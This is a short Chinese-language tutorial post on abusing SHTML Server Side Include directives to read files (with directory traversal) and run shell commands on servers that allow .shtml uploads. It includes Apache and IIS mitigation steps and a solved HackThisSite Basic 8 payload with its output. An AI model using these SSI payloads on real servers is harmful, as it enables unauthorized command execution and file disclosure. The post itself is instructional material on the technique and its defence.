首页 > 代码库 > SHTML的利用
SHTML的利用
SHTML用的是SSI指令
关于SSI指令:http://httpd.apache.org/docs/2.4/howto/ssi.html
在PHP禁止了命令执行函数,开了安全模式和服务器可以上传SHTML文件的时候可以试试看
当然服务器要允许SHTML的执行
<!--#include file="/home/www/user6987/nav_foot.htm"--> //可以用来读文件<!--#include virtual="/includes/header.html" --> //这个支持../来切换目录来读取文件<!--#exec cgi="/cgi-bin/gb.cgi"-->//将会执行CGI程序gb.cgi<!--#exec cmd="ifconfig"--> //可以用来执行命令<!--#printenv--> //显示当前存在于web系统中的所有环境变量<!--#echo var="DOCUMENT_URI" --> //显示当前文档的虚拟路径
禁止方法:
.Apache,将access.conf中的"Options Includes ExecCGI"这行代码删除;
.在IIS中,要禁用 #exec 命令,可修改 SSIExecDisable 元数据库;
在HackThisSite中也有道题目是考察SSI指令的。
Basic8:
<!-- #exec cmd="ls ../" -->#output#Hi, au12ha39vc.php index.php level8.php tmp!#Your name contains 39 characters.
SHTML的利用
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。